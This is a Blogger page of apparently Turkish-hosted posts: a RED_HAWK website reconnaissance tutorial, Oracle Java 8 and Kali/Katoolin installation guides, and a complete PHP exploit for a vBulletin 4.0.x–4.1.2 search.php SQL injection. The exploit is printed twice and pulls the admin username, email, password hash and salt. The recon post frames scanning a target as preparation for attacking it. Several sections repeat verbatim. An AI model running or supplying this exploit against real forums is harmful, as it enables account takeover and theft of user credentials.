29 Ocak 2019 Salı
Website Information Gathering with Red Hawk on Kali.
Welcome back hackers and pentesters to a tutorial on an all in one information gathering, and vulnerability analysis with a linux tool called Red Hawk. Recon and mapping out our target is a key step before we begin to hack or exploit anything. This tool helps automate this by seeing what our targeted site is running and if there are any exploits for it. Lets install it from our terminal and change to its directory, and then run it:
git clone github.com/Tuhinshubhra/RED_HAWK
Then change to red hawk directory:
cd RED_HAWK
Now lets run it:
php rhawk.php
Now enter your website and hit enter. Then specify between whether it uses http or https. We now have options of what we would like red hawk to search for. we are going to go with option one. As mapping out our target site is one of the first steps in pentesting, using red hawk can easily help speed up this process by having these tools in one place.
As you can see red hawk has scanned our target site. From these we learned the target site does not use cloudflare ddos protection, runs Pepyaka version 1.13.10 ect. This is all useful information for mapping out target and from there trying to find ways we can attack. To use it agin just enter php rhawk.php from the same terminal. if you closed it change directories to RED_HAWK/ agin. Thats all for today folks, get to scanning !
29 Ekim 2017 Pazar
How To Install Oracle Java 8 In Debian Via Repository [JDK8]
Oracle Java 8 was released yesterday and it can be installed in Debian by using the WebUpd8 Java PPA repository.
Usually, the packages available in Launchpad PPAs don't support Debian because they are built against specific Ubuntu libraries, but since the WebUpd8 Oracle Java PPA contains just an installer, it works on Debian too.
Using this PPA repository, you'll be able to install Oracle Java 8 (which includes both JRE8 and JDK8) in Debian for both 32bit and 64bit as well as ARM (ARM v6/v7 Hard Float ABI - there's no JDK 8 ARM Soft Float ABI archive available for download on Oracle's website).
The installer automatically downloads and installs Oracle JDK8, but no actual Java files are available in our repository (that's not allowed by the Oracle Java license).
For Ubuntu / Linux Mint installation instructions, see: Install Oracle Java 8 In Ubuntu Via PPA Repository [JDK8]
Install Oracle Java 8 (both JDK8 and JRE8) in Debian
Tested on Debian Wheezy but it should work with any Debian version |
To add the WebUpd8 Oracle Java PPA repository and install Oracle Java 8 in Debian, use the following commands:
su -
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys EEA14886
apt-get update
apt-get install oracle-java8-installer
exit
And that's it, Oracle Java 8 should now be installed and you should get automatic updates for future Oracle Java 8 versions, under Debian.
-----------------------------------------------------------
Update October 20, 2016:
Previously, this package would increment the Java priority to make it default. The oracle-java8-installer package now sets the Java priority to 1081, and that may or may not set it as default, depending on other Java packages you may have installed (for instance, if Java 7 is also installed, Java 8 becomes default, but if Java 9 is installed, Java 8 doesn't become default).
To make Java 8 default, you must install the "oracle-java8-set-default" package (which configures the Java environment variables and sets it as default), which I added as a "Recommended" package to "oracle-java8-installer".
For instance, in Ubuntu, recommended packages are automatically installed, so "oracle-java8-set-default" should be installed when installing "oracle-java8-installer". In Linux Mint on the other hand, recommended packages are not installed by default, so you must install this package manually if you want to set Oracle Java 8 as default.
So, if you want to set Oracle Java 8 as default, no matter what other Java versions are installed, make sure that you install the oracle-java8-set-default package (which, again, should be automatically installed with the main Oracle Java Installer package in Ubuntu, but not in Linux Mint):
If you don't want to make Oracle Java 8 default (it might still be set as default, depending on what other Java versions you may have installed), install the oracle-java8-installer with "--no-install-recommends":
Note: removing the oracle-java8-set-default package does not undo all the changes (I have yet to find a way to do this properly). If you don't want to set it as default, remove both oracle-java8-installer and oracle-java8-set-default packages, and then install oracle-java8-installer with "--no-install-recommends" (like mentioned above).
Tip: if you're behind a firewall / router that blocks some of the redirects required to download the Oracle Java archive, you can download the JDK tar.gz archive manually and place it under /var/cache/oracle-jdk8-installer - then, installing the "oracle-java8-installer" package will use the local archive instead of trying it to download it itself.
After installing Oracle Java and the "oracle-java8-set-default" package, you can check out the Java version on your system by using these commands:
For how to install Oracle Java 7 in Debian, see THIS article.
For Oracle Java 9, see THIS article.
Update October 20, 2016:
Previously, this package would increment the Java priority to make it default. The oracle-java8-installer package now sets the Java priority to 1081, and that may or may not set it as default, depending on other Java packages you may have installed (for instance, if Java 7 is also installed, Java 8 becomes default, but if Java 9 is installed, Java 8 doesn't become default).
To make Java 8 default, you must install the "oracle-java8-set-default" package (which configures the Java environment variables and sets it as default), which I added as a "Recommended" package to "oracle-java8-installer".
For instance, in Ubuntu, recommended packages are automatically installed, so "oracle-java8-set-default" should be installed when installing "oracle-java8-installer". In Linux Mint on the other hand, recommended packages are not installed by default, so you must install this package manually if you want to set Oracle Java 8 as default.
So, if you want to set Oracle Java 8 as default, no matter what other Java versions are installed, make sure that you install the oracle-java8-set-default package (which, again, should be automatically installed with the main Oracle Java Installer package in Ubuntu, but not in Linux Mint):
sudo apt-get install oracle-java8-set-default
If you don't want to make Oracle Java 8 default (it might still be set as default, depending on what other Java versions you may have installed), install the oracle-java8-installer with "--no-install-recommends":
sudo apt-get install --no-install-recommends oracle-java8-installer
Note: removing the oracle-java8-set-default package does not undo all the changes (I have yet to find a way to do this properly). If you don't want to set it as default, remove both oracle-java8-installer and oracle-java8-set-default packages, and then install oracle-java8-installer with "--no-install-recommends" (like mentioned above).
-----------------------------------------------------------
Tip: if you're behind a firewall / router that blocks some of the redirects required to download the Oracle Java archive, you can download the JDK tar.gz archive manually and place it under /var/cache/oracle-jdk8-installer - then, installing the "oracle-java8-installer" package will use the local archive instead of trying it to download it itself.
After installing Oracle Java and the "oracle-java8-set-default" package, you can check out the Java version on your system by using these commands:
java -version
This should display something like this:java version "1.8.0_111"
Java(TM) SE Runtime Environment (build 1.8.0_111-b14)
Java HotSpot(TM) 64-Bit Server VM (build 25.111-b14, mixed mode)
Or:javac -version
Which should display something like this:javac 1.8.0_111
For how to install Oracle Java 7 in Debian, see THIS article.
For Oracle Java 9, see THIS article.
How to accept the Oracle JDK8 license automatically
The Oracle Java 8 installer requires you to accept the Oracle license before the installation begins. If for some reason you want to accept the license automatically, you can use the following command:
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | sudo /usr/bin/debconf-set-selections
Update: if the command above doesn't work, use the following (thanks to Adam!):
echo oracle-java8-installer shared/accepted-oracle-licence-v1-1 boolean true | sudo /usr/bin/debconf-set-selections
Install packages you want in kali linux light
Install packages you want in kali linux light
a. Always take a backup
b. Create a repo source file
c. Paste following
If you have downloaded Kali Linux 32 bit mini, Kali Linux 64 bit mini, Kali Linux 32 bit Light, Kali Linux 64 bit Light, then you might find that some tools are missing and only some basic tools are available such as nmap, Aircrack-ng.
Kali Linux provide multiple metapackages that would allow us to easily install subsets of tools based on our particular needs. After installation of kali linux mini or light version here is what you want to do first. Below is the way to install the package you want.
1. Make sure you have correct repo. for more info go to http://docs.kali.org/general-use/kali-linux-sources-list-repositories
a. Always take a backup
# mv /etc/apt/sources.list /etc/apt/sources.list_BAK
b. Create a repo source file
# vi /etc/apt/sources.list
c. Paste following
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
# sudo apt-get update
d. search available metapackages
# apt-cache search kali-linux
you can play around with apt-cache
# apt-cache -h
# apt-cache showpkg kali-linux
e. If you want kali-linux-web package then install with below command
# apt-get install kali-linux-web
Find out list of tools inside each packages: http://tools.kali.org/kali-metapackages
What if you just want a tool. For example, if there is no arpspoof by default and
you want to install it
# apt-cache search arpspoof
# apt-get install dsniff
There you go :)
How to Auto Install All Kali Linux Tools Using “Katoolin” on Debian/Ubuntu
Katoolin is a script that helps to install Kali Linux tools on your Linux distribution of choice. For those of us who like to use penetration testing tools provided by Kali Linux development team can effectively do that on their preferred Linux distribution by using Katoolin.
In this tutorial we are going to look at steps to install Katoolin on Debian based derivatives.
Then make /usr/bin/katoolin executable by running the command below.
Incase the above way of installation fails, you also can try the following steps.
Go to https://github.com/LionSec/katoolin.git page download the zip file and extract it.
To view contents of /etc/apt/sources.list file, select of 4.
To view the available categories, select option 2 from the main menu.
You can also install a ClassicMenu indicator using Katoolin.
To install classicmenu indicator, press
To quit Katoolin, simply press Control+C.
In this tutorial we are going to look at steps to install Katoolin on Debian based derivatives.
Major Features of Katoolin
- Adding Kali Linux repositories.
- Removing Kali Linux repositories.
- Installing Kali Linux tools.
Requirements
Requirements for installing and using Katoolin.- An operating system for this case we are using Ubuntu 14.04 64-bit.
- Python 2.7
Installing Katoolin
To install Katoolin run the following commands.# apt-get install git
# git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
Sample Output
cp katoolin/katoolin.py /usr/bin/katoolin
Cloning into 'katoolin'...
remote: Counting objects: 52, done.
remote: Total 52 (delta 0), reused 0 (delta 0), pack-reused 52
Unpacking objects: 100% (52/52), done.
Checking connectivity... done.
# chmod +x /usr/bin/katoolin
Now you can run Katoolin as follows.# katoolin
The output below shows the interface of Katoolin when you run the command.Sample Output
$$\ $$\ $$\ $$\ $$\
$$ | $$ | $$ | $$ |\__|
$$ |$$ / $$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\ $$ |$$\ $$$$$$$\
$$$$$ / \____$$\ \_$$ _| $$ __$$\ $$ __$$\ $$ |$$ |$$ __$$\
$$ $$< $$$$$$$ | Kali linux tools installer |$$ |$$ |$$ | $$ |
$$ |\$$\ $$ __$$ | $$ |$$\ $$ | $$ |$$ | $$ |$$ |$$ |$$ | $$ |
$$ | \$$\ \$$$$$$$ | \$$$$ |\$$$$$$ |\$$$$$$ |$$ |$$ |$$ | $$ |
\__| \__| \_______| \____/ \______/ \______/ \__|\__|\__| \__| V1.0
+ -- -- +=[ Author: LionSec | Homepage: www.lionsec.net
+ -- -- +=[ 330 Tools
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
As you can see it provides a menu from which you can make selections of what you want to do.Incase the above way of installation fails, you also can try the following steps.
Go to https://github.com/LionSec/katoolin.git page download the zip file and extract it.
# wget https://github.com/LionSec/katoolin/archive/master.zip
# unzip master.zip
After extracting, you should be able to find katoolin.py script. Run katoolin.py command, you will be able to view the output similar to above.# cd katoolin-master/
# chmod 755 katoolin.py
# ./katoolin.py
How do I use Katoolin?
To add Kali Linux repositories and update repositories, select option 1 from the Menu.1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 1
1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 1
Sample Output
Executing: gpg --ignore-time-conflict --no-options --no-default-keyring --homedir /tmp/tmp.DC9QzwECdM --no-auto-check-trustdb --trust-model always --keyring /etc/apt/trusted.gpg --primary-keyring /etc/apt/trusted.gpg --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6
gpg: requesting key 7D8D0BF6 from hkp server pgp.mit.edu
gpg: key 7D8D0BF6: public key "Kali Linux Repository <devel@kali.org>" imported
gpg: Total number processed: 1
gpg: imported: 1 (RSA: 1)
Then you can select option 2 from the interface above to update the repositories. From the output below, I have only captured a portion where Kali Linux repositories are being updated so that one can install Kali Linux tools in Ubuntu.What do you want to do ?> 2
Ign http://in.archive.ubuntu.com vivid InRelease
Ign http://security.ubuntu.com vivid-security InRelease
Ign http://in.archive.ubuntu.com vivid-updates InRelease
Get:1 http://security.ubuntu.com vivid-security Release.gpg [933B]
Ign http://in.archive.ubuntu.com vivid-backports InRelease
Get:2 http://repo.kali.org kali-bleeding-edge InRelease [11.9 kB]
Get:3 http://security.ubuntu.com vivid-security Release [63.5 kB]
Hit http://in.archive.ubuntu.com vivid Release.gpg
Get:4 http://repo.kali.org kali-bleeding-edge/main amd64 Packages [8,164 B]
Get:5 http://in.archive.ubuntu.com vivid-updates Release.gpg [933 B]
Get:6 http://repo.kali.org kali-bleeding-edge/main i386 Packages [8,162 B]
Hit http://in.archive.ubuntu.com vivid-backports Release.gpg
...
If you want to delete the Kali Linux repositories you added, then select option 3.What do you want to do ?> 3
All kali linux repositories have been deleted !
As part of its operation, the Apt package uses a /etc/apt/sources.list that lists the ‘sources‘ from which you can obtain and install other packages.To view contents of /etc/apt/sources.list file, select of 4.
What do you want to do ?> 4
#deb cdrom:[Ubuntu 15.04 _Vivid Vervet_ - Release amd64 (20150422)]/ vivid main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
...
To go back you can simply type back and press [Enter]
key.What do you want to do ?> back
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat >
To go back to the main menu, simply type gohome and press [Enter]
key.kat > gohome
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat >
There are different categories of Kali Linux tools you can install on your Ubuntu using Katoolin.To view the available categories, select option 2 from the main menu.
kat > 2
**************************** All Categories *****************************
1) Information Gathering 8) Exploitation Tools
2) Vulnerability Analysis 9) Forensics Tools
3) Wireless Attacks 10) Stress Testing
4) Web Applications 11) Password Attacks
5) Sniffing & Spoofing 12) Reverse Engineering
6) Maintaining Access 13) Hardware Hacking
7) Reporting Tools 14) Extra
0) All
Select a category or press (0) to install all Kali linux tools .
You can select a category of choice or install all available Kali Linux tools by selecting option (0)
and press [Enter]
to install.You can also install a ClassicMenu indicator using Katoolin.
- ClassicMenu Indicator is a application indicator for the top panel of Ubuntu’s Unity desktop environment.
- ClassicMenu Indicator provides a simple way for you to get a classic GNOME-style application menu for those who prefer this over the default Unity dash menu.
To install classicmenu indicator, press
y
and press [Enter]
.kat > back
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 3
ClassicMenu Indicator is a notification area applet (application indicator) for the top panel of Ubuntu's Unity desktop environment.
It provides a simple way to get a classic GNOME-style application menu for those who prefer this over the Unity dash menu.
Like the classic GNOME menu, it includes Wine games and applications if you have those installed.
For more information , please visit : http://www.florian-diesch.de/software/classicmenu-indicator/
Do you want to install classicmenu indicator ? [y/n]> y
This PPA contains the most recent alpha/beta releases for
* Arronax http://www.florian-diesch.de/software/arronax/
* ClassicMenu Indicator http://www.florian-diesch.de/software/classicmenu-indicator/
* Privacy Indicator http://www.florian-diesch.de/software/indicator-privacy/
* RunLens http://www.florian-diesch.de/software/runlens/
* Unsettings http://www.florian-diesch.de/software/unsettings/
* UUdeLens http://www.florian-diesch.de/software/uudelens
More info: https://launchpad.net/~diesch/+archive/ubuntu/testing
Press [ENTER] to continue or ctrl-c to cancel adding it
gpg: keyring `/tmp/tmpaqk6fphl/secring.gpg' created
gpg: keyring `/tmp/tmpaqk6fphl/pubring.gpg' created
...
You can also install Kali menu in Ubuntu by select option 4 and press y and then press [Enter].To quit Katoolin, simply press Control+C.
kat > ^CShutdown requested...Goodbye...
11 Eylül 2017 Pazartesi
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
<?
/*
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
888 888 888
888 888 888
888 888 888
.d8888b .d88b. .d88888 .d88b. .d88888 88888b. 888 888
d88P" d88""88b d88" 888 d8P Y8b d88" 888 888 "88b 888 888
888 888 888 888 888 88888888 888 888 888 888 888 888
Y88b. Y88..88P Y88b 888 Y8b. Y88b 888 888 d88P Y88b 888
"Y8888P "Y88P" "Y88888 "Y8888 "Y88888 88888P" "Y88888
888
Y8b d88P
"Y88P"
8888888b. d8888 888888b. .d8888b. .d88888b. 888 888 888b 888
888 Y88b d88888 888 "88b d88P Y88b d88P" "Y88b 888 888 8888b 888
888 888 d88P888 888 .88P .d88P 888 888 888 888 88888b 888
888 d88P d88P 888 8888888K. 8888" 888 888 888 888 888Y88b 888
8888888P" d88P 888 888 "Y88b "Y8b. 888 888 888 888 888 Y88b888
888 T88b d88P 888 888 888 888 888 888 888 888 888 888 Y88888
888 T88b d8888888888 888 d88P Y88b d88P Y88b. .d88P Y88b. .d88P 888 Y8888
888 T88b d88P 888 8888888P" "Y8888P" "Y88888P" "Y88888P" 888 Y888
mail : v.b-4@hotmail.com
*/
?>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<center>
<h1>vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability</h1>
<form method='post' action=''>
<table border='1'>
<tr><td>Forum Url</td><td> <input type='text' size='100' name='url' value=''></td></tr>
<tr><td>User name</td><td> <input type='text' size='100' name='username' value=''></td></tr>
<tr><td>Password </td><td><input type='text' size='100' name='password' value='' ></td></tr>
<tr><td>Admin ID </td><td><input type='text' size='100' name='admin_id' value=''></td></tr>
<tr><td>Valid Group Search Word</td><td><input type='text' size='100' name='query'value='romnce'></td></tr>
</table>
<input type="hidden" name="form_action" value="1">
<input type='submit' value='Get'>
</form>
</center>
<?
if($_POST['form_action'] == 1 )
{
$query=$_POST["query"];
$url=$_POST["url"];
$admin_id=$_POST["admin_id"];
$sql="&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=".$admin_id."#";
$user=$_POST["username"];
$pass=$_POST["password"];
$md5Pass = md5($pass);
$data = "do=login&url=%2Findex.php&vb_login_md5password=$md5Pass&vb_login_username=$user&cookieuser=1";
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/login.php?do=login"); // replace ** with tt
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
// curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/search.php"); // replace ** with tt
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$sec=myf($store,'var SECURITYTOKEN = "','";');
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/search.php");
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"type%5B%5D=7&query=".$query."&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=".$sec."&do=process&searchthreadid=".$sql);
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$url2= trim(myf($store,"Location:","Content-Length:"));
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$url2);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
echo("<table border='1'>");
$list=explode(":", myf($store,'<p class="description">','</p>'));
echo("<tr><td>User Name</td><td><input size='100' type='text' value='".str_replace("Uncategorized,","",$list['3'])."'></td></tr>");
echo("<tr><td>Mail</td><td><input size='100' type='text' value='".$list['4']."'></td></tr>");
echo("<tr><td>MD5</td><td><input size='100' type='text' value='".$list['5']."'></td></tr>");
echo("<tr><td>Salt</td><td><input size='100' type='text' value='".$list['6']."'></td></tr>");
//print_r($list);
}
function myf($text,$marqueurDebutLien,$marqueurFinLien)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=$ar1[0];
return trim($ar);
}
?>
/*
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
888 888 888
888 888 888
888 888 888
.d8888b .d88b. .d88888 .d88b. .d88888 88888b. 888 888
d88P" d88""88b d88" 888 d8P Y8b d88" 888 888 "88b 888 888
888 888 888 888 888 88888888 888 888 888 888 888 888
Y88b. Y88..88P Y88b 888 Y8b. Y88b 888 888 d88P Y88b 888
"Y8888P "Y88P" "Y88888 "Y8888 "Y88888 88888P" "Y88888
888
Y8b d88P
"Y88P"
8888888b. d8888 888888b. .d8888b. .d88888b. 888 888 888b 888
888 Y88b d88888 888 "88b d88P Y88b d88P" "Y88b 888 888 8888b 888
888 888 d88P888 888 .88P .d88P 888 888 888 888 88888b 888
888 d88P d88P 888 8888888K. 8888" 888 888 888 888 888Y88b 888
8888888P" d88P 888 888 "Y88b "Y8b. 888 888 888 888 888 Y88b888
888 T88b d88P 888 888 888 888 888 888 888 888 888 888 Y88888
888 T88b d8888888888 888 d88P Y88b d88P Y88b. .d88P Y88b. .d88P 888 Y8888
888 T88b d88P 888 8888888P" "Y8888P" "Y88888P" "Y88888P" 888 Y888
mail : v.b-4@hotmail.com
*/
?>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<center>
<h1>vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability</h1>
<form method='post' action=''>
<table border='1'>
<tr><td>Forum Url</td><td> <input type='text' size='100' name='url' value=''></td></tr>
<tr><td>User name</td><td> <input type='text' size='100' name='username' value=''></td></tr>
<tr><td>Password </td><td><input type='text' size='100' name='password' value='' ></td></tr>
<tr><td>Admin ID </td><td><input type='text' size='100' name='admin_id' value=''></td></tr>
<tr><td>Valid Group Search Word</td><td><input type='text' size='100' name='query'value='romnce'></td></tr>
</table>
<input type="hidden" name="form_action" value="1">
<input type='submit' value='Get'>
</form>
</center>
<?
if($_POST['form_action'] == 1 )
{
$query=$_POST["query"];
$url=$_POST["url"];
$admin_id=$_POST["admin_id"];
$sql="&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=".$admin_id."#";
$user=$_POST["username"];
$pass=$_POST["password"];
$md5Pass = md5($pass);
$data = "do=login&url=%2Findex.php&vb_login_md5password=$md5Pass&vb_login_username=$user&cookieuser=1";
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/login.php?do=login"); // replace ** with tt
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
// curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/search.php"); // replace ** with tt
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$sec=myf($store,'var SECURITYTOKEN = "','";');
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/search.php");
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"type%5B%5D=7&query=".$query."&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=".$sec."&do=process&searchthreadid=".$sql);
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$url2= trim(myf($store,"Location:","Content-Length:"));
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$url2);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
echo("<table border='1'>");
$list=explode(":", myf($store,'<p class="description">','</p>'));
echo("<tr><td>User Name</td><td><input size='100' type='text' value='".str_replace("Uncategorized,","",$list['3'])."'></td></tr>");
echo("<tr><td>Mail</td><td><input size='100' type='text' value='".$list['4']."'></td></tr>");
echo("<tr><td>MD5</td><td><input size='100' type='text' value='".$list['5']."'></td></tr>");
echo("<tr><td>Salt</td><td><input size='100' type='text' value='".$list['6']."'></td></tr>");
//print_r($list);
}
function myf($text,$marqueurDebutLien,$marqueurFinLien)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=$ar1[0];
return trim($ar);
}
?>
Kaydol:
Kayıtlar (Atom)